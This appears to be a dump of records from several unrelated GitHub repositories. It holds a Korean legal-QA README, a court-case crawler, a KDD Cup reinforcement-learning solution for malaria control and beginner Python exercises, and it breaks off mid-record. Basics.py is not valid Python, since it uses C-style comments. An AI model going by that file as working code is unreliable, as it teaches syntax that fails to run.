\n--overwrite_output \n--overwrite_cache \n--output_dir ../../outputDir/multilingual/ \n--save_steps 5000 \n--make_cache_file False\n```\n\nmultilingualBERT/runningcode 폴더 안에 있는 run_squad.py 실행시 입력 인자로 받은 train_file을 이용하여 학습하고, predict_file로 모델 평가를 한다. <br/>\npredict_file에 대한 f1 score와 exact match score를 결과로 출력창에 보여준다.\n\noutput_dir인 결과 폴더 안에는 예측 결과가 들어 있는 predictions.json,<br/>\nfine tuning 을 거친 모델인 pytorch_model.bin 등이 생성된다.\n\n\n### 3. ETRI-BERT\n\nEtri의 KorBERT를 사용하기 위해서는 [이 사이트](http://aiopen.etri.re.kr/service_dataset.php)에서 사용허가협약서를 작성한 뒤 다운로드 받아야 한다.<br/>\npretrained model은 개인이 따로 공개할 수 없어 업로드하지 않겠지만, 모델을 다운받은 후 EtriBERT/ 폴더에 넣어주면 된다.\n\n\n#### 3-1. 형태소 분석용 파일을 생성\n\n```\npython3 tokenizing.py\n--openapi_key your key\n--input_file ../../data/law.json \n--output_file ../../data/tokenizing.json\n```\n\nEtriBERT를 사용하기 위해서는 Etri에서 제공하는 형태소 분석 API를 사용하여 형태소 분석된 문장을 인풋으로 넣어줘야한다.<br/>\n하지만 형태소 분석 API 호출은 하루 당 5000건으로 제한되어 있기에 API를 미리 호출시켜 학습 시 사용될 입력 문장을 형태소 분석된 문장으로 바꾼 뒤 파일인 tokenizing.json에 저장해야한다.\n\n* 모든 데이터가 들어있는 law.json 파일을 불러와서 API호출 후 tokenizing.json 파일을 생성\n\n\n#### 3-2. EtriBERT를 실행\n\n```\npython3 run_squad_ETRI.py \n--openapi_key `your key` \n--bert_model .. \n--train_file ../../data/train.json \n--predict_file ../../data/test.json \n--output_dir ../../outputDir/EtriBERT \n--tokenized_file ../../data/tokenizing.json \n--do_train \n--do_predict\n```\n\nEtriBERT 폴더 안에 있는 run_squad_ETRI.py 실행시 train_file을 학습시켜, test_file을 f1 score와 exact match score를 통해 평가한다.<br/>\n결과 폴더 안에 예측 결과가 들어 있는 predictions.json과 점수가 들어있는 result.txt, fine tuning된 모델인 pytorch_model.bin가 생성된다.\n\n> openapi_key는 etri API DATA 서비스 포털에서 발급 가능하다.<br/>\n> 반드시 발급받은 후 key값을 넣어주어야 한다.\n\n## Result\n\n한국어만을 사용해 학습한 뒤 형태소 분석기를 사용한 Etri의 KorBERT가 Multilingual BERT에 비해 전체적으로 높은 성능을 보였다.\n\n\n\n## Award\n\n논문 이름 : [기계독해를 이용한 판례 내 주요 정보 추출 방법](https://www.cseric.or.kr/literature/ser_view.php?searchCate=literature&SnxGubun=INME&mode=total&SnxGubun=INME&gu=INME000F9&cmd=qryview&SnxIndxNum=214256&rownum=1&f1=MN&q1=Junho%20Won)\n\n<img src=\"./award/award.jpg\" width=\"300\" height=\"300\">\n"
},
{
"alpha_fraction": 0.5734567642211914,
"alphanum_fraction": 0.5808641910552979,
"avg_line_length": 31.83783721923828,
"blob_id": "33d2a1521f1dae83ba3b9791b1be0c9b4a111e3a",
"content_id": "69493d5284f7a6950e67900adb22128441345f76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4948,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 148,
"path": "/crawler/run_crawler.py",
"repo_name": "junho-one/AILaw",
"src_encoding": "UTF-8",
"text": "import re\nimport json\nfrom threading import Thread\nimport queue\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nimport pandas as pd\n\nclass ThreadWithReturnValue(object):\n def __init__(self, target=None, args=(), **kwargs):\n self._que = queue.Queue()\n self._t = Thread(target=lambda q,arg1,kwargs1: q.put(target(*arg1, **kwargs1)) ,\n args=(self._que, args, kwargs), )\n self._t.start()\n\n def join(self):\n self._t.join()\n return self._que.get()\n\ndef crawlCases(driver, wait, prev_data_title_list):\n url_list = driver.find_element_by_xpath('//*[@id=\"search_result\"]/div/article/dl').find_elements_by_tag_name('a')\n\n contents = []\n titles = []\n for url in url_list:\n url.click()\n\n window_before = driver.window_handles[0]\n window_after = driver.window_handles[1]\n\n\n driver.switch_to.window(window_after)\n\n wait.until(EC.presence_of_element_located((By.TAG_NAME, 'iframe')))\n iframes = driver.find_elements_by_tag_name('iframe')\n if len(iframes) != 1:\n print(\"iframe error\")\n exit()\n driver.switch_to.frame(iframes[0])\n\n case = driver.find_element_by_xpath(\"/html/body\")\n case = case.text\n\n title = case.split(\"\\n\")[0]\n title = title.replace(\",\", \"\")\n title = title.replace(\" \", \"\")\n\n if \"선고\" in title:\n title = title.split(\"선고\")[1]\n if \"【\" in title:\n title = title.split(\"【\")[0]\n if \":\" in title:\n title = title.split(\":\")[0]\n\n # title = re.sub('[^【]', '', title)\n # # title = re.sub('[【】]', '', title)\n # # match = re.search(\"[【】]\", title)\n # # title.mat\n\n if title not in prev_data_title_list:\n contents.append(case)\n titles.append(title)\n\n driver.switch_to.window(window_before)\n\n return contents\n\n\ndef crawling(keyword):\n prev_data_title_list = []\n prev_data_fn = \"../korcl_2019/law.json\"\n with open(prev_data_fn, 'r', encoding='utf-8') as f:\n prev_data = json.load(f)['data']\n\n for prev_case in prev_data:\n prev_case_title = prev_case['title']\n prev_case_title = prev_case_title.replace(\",\", \"\")\n prev_case_title = prev_case_title.replace(\" \", \"\")\n\n if \"선고\" in prev_case_title:\n prev_case_title = prev_case_title.split(\"선고\")[1]\n if \"【\" in prev_case_title:\n prev_case_title = prev_case_title.split(\"【\")[0]\n if \":\" in prev_case_title:\n prev_case_title = prev_case_title.split(\":\")[0]\n\n prev_data_title_list.append(prev_case_title)\n\n print(\"Target Keyword : {}\".format(keyword))\n\n all_data = []\n driver = webdriver.Chrome('./chromedriver.exe') # fixed to Window OS\n wait = WebDriverWait(driver, 10)\n driver.get(\n \"https://legalsearch.kr/list/prec?cols=ALL_CONTENTS&keyword=\" + keyword + \"&court_code=400202&sort=score&pageSize=20&filter_search=true\")\n\n url = driver.find_element_by_xpath('//*[@id=\"search_result\"]/div/article/dl').find_elements_by_tag_name('a')\n\n cases = []\n prev = \"\"\n while True:\n if driver.current_url == prev:\n break\n prev = driver.current_url\n\n content = crawlCases(driver, wait, prev_data_title_list)\n cases.extend(content)\n driver.find_element_by_xpath('/html/body/div[2]/section/div/article/div[2]').find_elements_by_tag_name('a')[-1].click()\n wait.until(EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/section/div/article/div[2]')))\n\n driver.quit()\n all_data.extend(cases)\n return all_data\n\n\nif __name__ == '__main__':\n keywords = [\"강제추행\",\"강간\",\"유사강간\",\"준강간\",\"준강제추행\",\"간음\"] # 성범죄\n # keywords = [] # 폭행\n # keywords = [] # 살인\n\n # Run Thread For each keyword\n twrv = [ThreadWithReturnValue(target=crawling, args=(keyword,)) for keyword in keywords]\n\n crawled_data = []\n for t in twrv:\n crawled_data.extend(t.join())\n\n # For Dumping - Pandas DataFrame And Excel File\n column_names = ['id', 'content']\n df_construction = []\n for idx, content in enumerate(crawled_data):\n for sentence_idx, content_line in enumerate(content.split(\"\\n\")):\n if sentence_idx == 0:\n df_construction.append([str(idx), content_line])\n elif content_line == '\\n' or content_line == ' ' or content_line == '':\n continue;\n else:\n df_construction.append(['', content_line])\n df_construction.append(['', ''])\n\n df = pd.DataFrame(df_construction, columns=column_names)\n\n to_excel_fn = \"./new_data.xlsx\"\n df.to_excel(to_excel_fn)\n"
}
] | 5 |
Sandy4321/KDD_Cup_2019_LOLS_Team
|
https://github.com/Sandy4321/KDD_Cup_2019_LOLS_Team
|
6009c9fbe858004b92add0c9fd95e7fa87b85f01
|
e5e4b0de09ec939bec683c74d4b43f9d50b9521f
|
3269c8c180a180289ca24f329fddb14783e52013
|
refs/heads/master
| 2022-04-11T05:04:10.897655 | 2019-12-23T14:55:14 | 2019-12-23T14:55:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7044335007667542,
"alphanum_fraction": 0.7758620977401733,
"avg_line_length": 27.785715103149414,
"blob_id": "31225499f74a522501a8ffd242fe66e9266300ff",
"content_id": "fd44f6bd021716dcc7c84f75719fb72e83110efc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 406,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 14,
"path": "/README.md",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "# KDD Cup 2019: LOLs team (rank 7th) final solution \n\n\nCompetition: KDD Cup 2019 Reinforcement Learning Malaria Control\n\nLink: https://compete.hexagon-ml.com/practice/rl_competition/37/\n\nSolution: Q-learning with sequences breaking \n\nThis solution got rank 7th in the competition\n\nPoster: https://github.com/bach1292/KDD_Cup_2019_LOLS_Team/blob/master/Poster.pdf\n\nPaper: http://arxiv.org/abs/1910.08926\n\n\n\n"
},
{
"alpha_fraction": 0.5100229978561401,
"alphanum_fraction": 0.5310548543930054,
"avg_line_length": 39.85234832763672,
"blob_id": "7d518dec9c409dab95bab220d63f8fee8580cef5",
"content_id": "f2080fcc801c04382eef5144cd06eb021a9f526b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6086,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 149,
"path": "/submission.py",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom collections import defaultdict\nimport random\n\n!pip3 install git+https://github.com/slremy/netsapi --user --upgrade\n\nfrom netsapi.challenge import *\nclass CustomAgent():\n \n def __init__(self, environment):\n \n #Hyperparameters\n self.env = environment\n self.epsilon = 0.9\n self.gamma = 0.9\n self.action_resolution = 0.1\n self.action_resolution_year1 = 0.3\n self.Q = defaultdict(lambda : 0.) # Q-function\n self.n = defaultdict(lambda : 1.) # number of visits\n self.actions = self.actionSpace(self.action_resolution)\n self.actionspace = range(len(self.actions)-1)\n self.policymax = []\n self.actionyear1 = self.actionSpace(self.action_resolution_year1)\n self.actionspaceyear1 = range(len(self.actionyear1)-1)\n self.memory = []\n \n \n def actionSpace(self,resolution):\n x,y = np.meshgrid(np.arange(0,1.1,resolution), np.arange(0,1.1,resolution))\n xy = np.concatenate((x.reshape(-1,1), y.reshape(-1,1)), axis=1)\n return xy.round(2).tolist()\n def exploitSpace(self,action,resolution):\n cactionspace = []\n final = []\n for i in [resolution,0,-resolution]:\n for j in [resolution,0,-resolution]:\n cactionspace.append([action[0]+j,action[1]+i])\n for a in cactionspace:\n if(a not in self.memory and a[0]<=1 and a[0]>=0 and a[1]<=1 and a[1]>=0):\n final.append(a)\n# print(\"final: \", final)\n return final\n def train(self):\n rewardmax = -999999\n policymax = []\n currentReward = 0\n Q = self.Q\n n = self.n\n gamma = self.gamma\n actions = self.actions\n actionspace = self.actionspace\n actionyear1 = self.actionyear1\n actionspaceyear1 = self.actionyear1\n currentPolicy = []\n maxactionyear1 = []\n greedy_action = lambda s : max(actionspace, key=lambda a : Q[(s,a)])\n max_q = lambda sp : max([Q[(sp,a)] for a in actionspace])\n rewardmaxyear1 = -9999\n count = 20 # 20 evaluations = 4 policies\n #find action for the first year with 20 evaluations\n for a in actionyear1:\n \n tempa = a\n count-=1\n self.env.reset()\n _,reward,_,_ = self.env.evaluateAction(tempa);\n# print(\"57: \", reward, \" \", tempa)\n self.memory.append(tempa)\n if(reward > rewardmaxyear1):\n rewardmaxyear1 = reward\n maxactionyear1 = tempa\n \n spaceExploit = self.exploitSpace(maxactionyear1,self.action_resolution)\n while(count>0):\n self.env.reset()\n nextaction = []\n direct = 0\n if(direct == 1):\n actionchoice = nextaction\n else:\n actionchoice = random.choice(spaceExploit)\n if(actionchoice not in self.memory):\n self.env.reset()\n _,reward,_,_ = self.env.evaluateAction(actionchoice)\n# print(\"74: \",reward, \" \", actionchoice)\n count-=1\n self.memory.append(actionchoice)\n direction = [actionchoice[0] - maxactionyear1[0],actionchoice[1] - maxactionyear1[1]]\n if(reward > rewardmaxyear1):\n rewardmaxyear1 = reward\n maxactionyear1 = actionchoice\n nextaction = [actionchoice[0] + direction[0],actionchoice[1] + direction[1]]\n direct =1\n if(nextaction[0] >1 or nextaction[0] <0 or nextaction[1] >1 or nextaction[1] <0):\n nextaction = [actionchoice[0] - direction[0],actionchoice[1] - direction[1]]\n spaceExploit = self.exploitSpace(nextaction,self.action_resolution)\n direct = 0\n# if(spaceExploit.index[actionchoice])\n# spaceExploit.remove(actionchoice)\n for e in range(16): #16 policies left\n epsilon = 0.8-(e/(16*1.2))\n self.env.reset()\n nextstate = self.env.state\n currentReward = 0\n currentPolicy=[]\n# print(maxactionyear1,\" \", rewardmaxyear1)\n while True:\n state = nextstate\n\n # Epsilon-Greedy Action Selection\n if epsilon > random.random() :\n action = random.choice(actionspace)\n else :\n action = greedy_action(state)\n n[(state,action)]+=1\n env_action = actions[action]#convert to ITN/IRS\n #print('env_action', env_action)\n if(state == 1 ):\n env_action = maxactionyear1\n nextstate, reward, done, _ = self.env.evaluateAction(env_action)\n currentReward += reward\n currentPolicy.append(env_action)\n # Q-learning\n if done :\n Q[(state,action)] = Q[(state,action)] + 1./n[(state,action)] * ( reward - Q[(state,action)] )\n if(currentReward > rewardmax):\n# print(rewardmax)\n rewardmax = currentReward\n self.policymax = currentPolicy[:]\n# print(self.policymax)\n break\n else :\n Q[(state,action)] = Q[(state,action)] + 1./n[(state,action)] * ( reward + gamma * max_q(nextstate) - Q[(state,action)] )\n\n return Q\n\n\n def generate(self):\n best_policy = None\n best_reward = -float('Inf')\n Q_trained = self.train()\n# greedy_eval = lambda s : max(self.actionspace, key=lambda a : Q_trained[(s,a)])\n# print(self.policymax)\n best_policy = {state : (self.policymax[state-1]) for state in range(1,6)}\n best_reward = self.env.evaluatePolicy(best_policy)\n \n print(best_policy, best_reward)\n \n return best_policy, best_reward"
},
{
"alpha_fraction": 0.519303560256958,
"alphanum_fraction": 0.7130961418151855,
"avg_line_length": 17.095890045166016,
"blob_id": "a10a6561a005df0b1ede22b8fc88d0b962457e82",
"content_id": "aa11e214c41053befcde6ae635e8af3f3ebc5f66",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1321,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 73,
"path": "/Requirements.txt",
"repo_name": "Sandy4321/KDD_Cup_2019_LOLS_Team",
"src_encoding": "UTF-8",
"text": "backcall==0.1.0\nbayesian-optimization==1.0.1\nbleach==2.1.3\ncertifi==2019.3.9\nchardet==3.0.4\ncolorama==0.3.9\ncycler==0.10.0\ndecorator==4.3.0\nentrypoints==0.2.3\nget==2019.4.13\nhtml5lib==1.0.1\nidna==2.8\nipykernel==4.8.2\nipython==6.3.1\nipython-genutils==0.2.0\nipywidgets==7.2.1\njedi==0.12.0\nJinja2==2.10\njsonschema==2.6.0\njupyter==1.0.0\njupyter-client==5.2.3\njupyter-console==5.2.0\njupyter-contrib-core==0.3.3\njupyter-contrib-nbextensions==0.5.1\njupyter-core==4.4.0\njupyter-highlight-selected-word==0.2.0\njupyter-latex-envs==1.4.6\njupyter-nbextensions-configurator==0.4.1\nkiwisolver==1.0.1\nlxml==4.3.0\nMarkupSafe==1.0\nmatplotlib==3.0.1\nmistune==0.8.3\nnbconvert==5.3.1\nnbformat==4.4.0\nnetsapi==1.2\nnltk==3.2.5\nnotebook==5.4.1\nnumpy==1.14.2\npandas==0.23.4\npandocfilters==1.4.2\nparso==0.2.0\npatsy==0.5.1\npickleshare==0.7.4\npost==2019.4.13\nprompt-toolkit==1.0.15\npublic==2019.4.13\nPygments==2.2.0\npyparsing==2.3.0\npython-dateutil==2.7.2\npytz==2018.7\npywinpty==0.5.1\nPyYAML==3.13\npyzmq==17.0.0\nqtconsole==4.3.1\nquery-string==2019.4.13\nrequest==2019.4.13\nrequests==2.21.0\nscikit-learn==0.19.1\nscipy==1.1.0\nSend2Trash==1.5.0\nsimplegeneric==0.8.1\nsix==1.11.0\nstatsmodels==0.9.0\nterminado==0.8.1\ntestpath==0.3.1\ntornado==5.0.2\ntqdm==4.28.1\ntraitlets==4.3.2\nurllib3==1.24.2\nwcwidth==0.1.7\nwebencodings==0.5.1\nwidgetsnbextension==3.2.1\n"
}
] | 3 |
ManikhweSchool/Introduction-To-Python-Programming
|
https://github.com/ManikhweSchool/Introduction-To-Python-Programming
|
d6c8b0cfc67764478c5e8fc8b5fb35e1cad5d770
|
b528a209ec575daaf345b981cbdc32a8dfc2ee59
|
f49d5e74966958bfdf4d013d826587e7839fa8fa
|
refs/heads/master
| 2023-03-11T18:58:08.779643 | 2021-02-22T03:41:28 | 2021-02-22T03:41:28 | 341,064,756 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.36538460850715637,
"alphanum_fraction": 0.4615384638309479,
"avg_line_length": 25.5,
"blob_id": "2302caafd34cc6a01a20ed7652bafd3fdcb81016",
"content_id": "11a010b7544013e2a992e699370ced3bbb8ed77a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_4a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(20):\n\tprint((i+1), '---',(i+1)*(i+1))"
},
{
"alpha_fraction": 0.681073009967804,
"alphanum_fraction": 0.7049180269241333,
"avg_line_length": 33.35897445678711,
"blob_id": "39a552cf1830febfca025a1617f9b6a200310460",
"content_id": "2676f2e9cde0723440c244768981dd8a1c9ae237",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1342,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 39,
"path": "/Basics/Basics.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "/*\nExample 1\nRetrieve user input and display the result on the console.\nTo print several things at once, separate them by commas. \nPython will automatically insert spaces\n*/\nname = input('Enter your name')\nprint('Your Name Is', name)\nprint('A',1,'B',2)\n// Inconvenient\nprint ('The value of 1+1 is', 1+1, '.') \n// Convenient because we take advantate of the seperator.\n// We can set anything to our seperator.\nprint ('The value of 3+4 is ', 3+4, '.', sep='') \n/* In order to display strings in one line using \ntwo print statements we need to set the end argument \nto the first print.*/\nprint('On the first line ', end='')\nprint('On the same line')\n\n/*\nExample 2\nThe eval function converts the text entered \nby the user into a number. One nice feature \nof this is you can enter expressions, like \n3*12+5, and eval will compute them for you.*/\ntemp = eval(input('Enter a temperature in Celsius : '))\nprint('In Fahrenheit, that is ', 9/5*temp+32)\n\n/* Example 3*/\nnumber1 = eval(input('Enter first number : '))\nnumber2 = eval(input('Enter second number : '))\nnumber3 = eval(input('Enter third number : '))\nnumber4 = eval(input('Enter forth number : '))\nnumber5 = eval(input('Enter fifth number : '))\nsum = number1+number2+number3+number4+number5\naverage = sum/5\nprint('The Average Of Numbers Is ', average)\nprint('Sum Of All Numbers Is ', sum)\n\n\n"
},
{
"alpha_fraction": 0.6952789425849915,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 37.83333206176758,
"blob_id": "479e3a452d432eb0cd4b3bcc8953c1cab0902a49",
"content_id": "35f4f4844578bc6bacb78f505a887b4e52cbaf80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 6,
"path": "/Numbers/Exercises/Exercise_3_8_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "hour = eval(input('Enter hour : '))\nhoursAhead = eval(input('How many hours ahead : '))\nnewHour = (hour+hoursAhead)%12\n\n# Back splash is a special character in python. It an escaping character.\nprint('New hour :',newHour,'o\\'clock')\n"
},
{
"alpha_fraction": 0.5816993713378906,
"alphanum_fraction": 0.6307189464569092,
"avg_line_length": 22.538461685180664,
"blob_id": "e48b6491740d14f4df53db26708e8bb590ffe51e",
"content_id": "2d6bbaab5918403da52464a03024e0414f59cf95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 13,
"path": "/For Loops/Exercises/Exercise_2_5_9a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "fib1 = 1\nfib2 = 1\nfib = fib1+fib2\n\nnumberOfFib = eval(input('Enter Number of Elements In The Sequence : '))\nprint(fib1,fib2,fib,sep=',',end='')\n\nfor i in range(numberOfFib-3):\n fib1 = fib2\n fib2 = fib\n fib = fib1+fib2\n print(',',fib,sep='',end='')\n# What is a user enters a number less than 3?\n"
},
{
"alpha_fraction": 0.49640288949012756,
"alphanum_fraction": 0.5377697944641113,
"avg_line_length": 24.272727966308594,
"blob_id": "dff707663825bdeb46b0dd7817d7e958941f2b00",
"content_id": "1960df42712f57a25868243de32d0ea2cfbf20bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 22,
"path": "/For Loops/Exercises/Exercise_2_5_9b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "fib1 = 1\nfib2 = 1\nfib = fib1+fib2\n\nnumberOfFib = eval(input('Enter Number of Elements In The Sequence : '))\nif numberOfFib<=0:\n print('Start Over : Invalid Input.')\n\nelif numberOfFib==1:\n print(fib1)\nelif numberOfFib==2:\n print(fib1,fib2,sep=',')\nelif numberOfFib==3:\n print(fib1,fib2,fib,sep=',',end='')\nelse:\n print(fib1,fib2,fib,sep=',',end='')\n\n for i in range(numberOfFib-3):\n fib1 = fib2\n fib2 = fib\n fib = fib1+fib2\n print(',',fib,sep='',end='')\n"
},
{
"alpha_fraction": 0.5072463750839233,
"alphanum_fraction": 0.5652173757553101,
"avg_line_length": 34,
"blob_id": "ac42ce4bd3de6afcb6664d46ad3bf8c3d4941f79",
"content_id": "5ef2d5761bb81fe573ce6d0b8cb74531e1b30426",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 69,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/Basics/Exercises/Exercise_1_8_6c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "x = eval(input('Enter a number:'))\nprint(x,2*x,3*x,4*x,5*x,sep='---')"
},
{
"alpha_fraction": 0.5151515007019043,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 16,
"blob_id": "f043110009d4e11b7739af325ee05538958bf7f5",
"content_id": "de8113fa43e3aa4b86312348678aadf711e7d0be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_5b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(8,92,3):\n\tprint(i)"
},
{
"alpha_fraction": 0.6411150097846985,
"alphanum_fraction": 0.6759582161903381,
"avg_line_length": 25.18181800842285,
"blob_id": "4ae76bc3f7a8f77fd8fcad9a825da236b5c27056",
"content_id": "d4ecb619c40b70e4d2570926b331ea313c06679a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/Basics/Exercises/Exercise_1_8_8b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "number1 = eval(input('Enter number1 : '))\nnumber2 = eval(input('Enter number2 : '))\nnumber3 = eval(input('Enter number3 : '))\ntotal = number1\ntotal = total + number2\ntotal = total + number3\naverage = total\naverage = average/3\n\nprint('Total =',total, end=' & ')\nprint('Average =',average)"
},
{
"alpha_fraction": 0.5581395626068115,
"alphanum_fraction": 0.6279069781303406,
"avg_line_length": 42,
"blob_id": "59f6ea9b60a08ac3f861bd076d9bb6ee7c7db05f",
"content_id": "df2be7f706a18828ff303b31c344b44fec9a6fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 2,
"path": "/For Loops/Exercises/Exercise_2_5_3b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "for i in range(2,202,2):\n\tprint((i//2), 'Lwandile Ganyile') # We perform integer division on i.\n"
},
{
"alpha_fraction": 0.6761658191680908,
"alphanum_fraction": 0.696891188621521,
"avg_line_length": 31.16666603088379,
"blob_id": "959db6ac483b4034ff9ce7c369298c63d2307f55",
"content_id": "22e8e1f86d550495379dbfc30c65bcd51f8744cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/Basics/Exercises/Exercise_1_8_9c.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "mealPrice = eval(input('Enter Meal Price : '))\ntipPercent = eval(input('Enter Tip Percent : '))\n\nif mealPrice <= 0:\n\tprint('Error : Invalid Meal Price.')\nelse:\n\tif tipPercent >= 0 or tipPercent <= 100:\n\t\ttipAmount = (tipPercent/100)*mealPrice\n\t\ttotalPrice = mealPrice + tipAmount\n\t\tprint('Final Price =',totalPrice,'Tip Amount =',tipAmount)\n\telse:\n\t\tprint('Error Invalid Tip Percent.')\n"
},
{
"alpha_fraction": 0.6536144614219666,
"alphanum_fraction": 0.6777108311653137,
"avg_line_length": 40.5,
"blob_id": "1718cb7096285422beccf7534c8327f041a9cb47",
"content_id": "f6ee78a9769194a8383ac836041e812eeb8fd804",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 8,
"path": "/Numbers/Exercises/Exercise_3_8_9b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "hour = eval(input('Enter hour : '))\nhoursAhead = eval(input('How many hours ahead : '))\n\nif hour<=12 and hour>=1 and hoursAhead<=12 and hoursAhead>=1:\n # Back splash is a special character in python. It an escaping character.\n print('New hour :',(hour+hoursAhead)%12,'o\\'clock')\nelse:\n print('Error : Invalid User Input.')\n"
},
{
"alpha_fraction": 0.5563910007476807,
"alphanum_fraction": 0.5939849615097046,
"avg_line_length": 18,
"blob_id": "a0c318ba0f6e9877281aaec67c955098b49e1daf",
"content_id": "5fe8f69ba77a119a12c7a651e8f9fda1a626f568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_2a.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "from random import randint\nimport math\nx = randint(1,50)\ny = randint(2,5)\n\nprint('x = ',x,'\\ty = ',y,sep='')\nprint('x^y =',pow(x,y))\n"
},
{
"alpha_fraction": 0.6646706461906433,
"alphanum_fraction": 0.688622772693634,
"avg_line_length": 22.85714340209961,
"blob_id": "743e410989da444c7e9b32039369575a9108f385",
"content_id": "963f2f51592a6449599cff932c1c10348187c4a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/Numbers/Exercises/Exercise_3_8_10b.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = 2**power\nlastDigits = number%100\n\nprint('Power =',power)\nprint('Number =',number)\nprint('Last Two Digits =',lastDigits)\n"
},
{
"alpha_fraction": 0.6758241653442383,
"alphanum_fraction": 0.6868131756782532,
"avg_line_length": 32.09090805053711,
"blob_id": "3808854381b586588410cbe243c7bd9594ea6414",
"content_id": "f6eef15264f6638d2ada39d4001d1c3382fae559",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/Numbers/Exercises/Exercise_3_8_1cb.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
"text": "power = eval(input('Enter power : '))\nnumber = pow(2,power)\nnumberOfLastDigits = eval(input('Enter number of last digits : '))\n\nif numberOfLastDigits>0:\n lastDigits = number%(pow(10,numberOfLastDigits))\n print('Power =',power)\n print('Number =',number)\n print('Last',numberOfLastDigits,'digit(s)' ,lastDigits)\nelse:\n print('Error : Invalid Input.')\n"
},
{
"alpha_fraction": 0.6933115720748901,
"alphanum_fraction": 0.7340946197509766,
"avg_line_length": 24.54166603088379,
"blob_id": "65bce326cd14a9b39f2b08095bbb819b8bf893b7",
"content_id": "dfc1d18e2fe0c349bda6938dc9c8a63f9fa7aa7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 613,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 24,
"path": "/Numbers/Numbers.py",
"repo_name": "ManikhweSchool/Introduction-To-Python-Programming",
"src_encoding": "UTF-8",
